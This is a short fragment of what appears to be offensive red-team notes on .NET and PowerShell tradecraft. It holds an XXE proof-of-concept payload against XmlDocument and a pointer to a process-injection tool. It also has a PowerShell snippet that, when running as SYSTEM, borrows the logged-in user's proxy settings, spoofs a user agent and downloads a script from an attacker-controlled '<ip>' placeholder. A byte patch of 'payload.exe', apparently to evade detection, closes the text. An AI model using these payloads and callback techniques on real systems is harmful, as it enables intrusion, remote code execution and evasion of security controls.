Install-Package Costura.Fody
XMLDocument PoC:
<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>
This works on Net Framework <= 4.0 if the Resolver was not explicitly set to null.
​https://github.com/ChadSki/SharpNeedle​
It will not verify through the chain but if the program does not check the whole chain it works ;-)
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()$Assemblies |ForEach-Object {$_.Location$_.GetTypes()|ForEach-Object {$_ | Get-Member -Static| Where-Object {$_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods')}} 2> $null}
Sometimes we execute as SYSTEM and still need to use the boxes proxy settings to call back to us. In this case we can resolve the current proxy settings from HKCU and copy them.
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null$keys = Get-ChildItem 'HKU:\'ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}$proxy=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer[system.net.webrequest]::DefaultWebProxy = new-objectSystem.Net.WebProxy("http://$proxy")$wc = new-object system.net.WebClient$wc.Headers.Add('User-Agent', "Legit User Agent")$wc.DownloadString("http://<ip>/script.ps1")
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")$bytes[200] = 0xFF[System.IO.File]::WriteAllBytes("payload.exe", $bytes)